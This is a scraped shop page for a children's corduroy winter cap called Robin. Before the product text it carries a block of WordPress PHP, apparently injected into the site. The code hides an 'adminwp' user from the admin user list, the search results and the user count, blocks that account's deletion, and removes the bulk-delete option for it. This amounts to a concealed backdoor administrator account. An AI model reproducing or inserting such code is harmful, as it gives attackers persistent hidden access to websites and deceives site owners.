add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'adminwp') { wp_die( __('User adminwp tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; }); Robin - New Kids in the House : New Kids in the House yz9CDIm90hc8NvJjnm_WUrcZaR71UfJfT3cooSWrPoE
menuclose
< back to overview
product-image product-image product-image product-image product-image product-image product-image product-image

Robin snake green

Sold out

Robin is a 5-panel winter cap made of corduroy with an extra warm plush lining. It comes in 4 different sizes for babies and kids up to 8 years. Please check our sizing information for details.

The snake green model features our signature soft-visor and an embroidered snake-logo on the front. The cap has ear flaps and can be tied with a ribbon.

– made of premium german corduroy (industrial overproduction)
– lining in organic cotton plush (made in Italy)
– ear flaps with ribbon
– soft-visor
– from 6 M to 8 Y
– handmade in Germany

Sizing information
Delivery and payment

Bag

0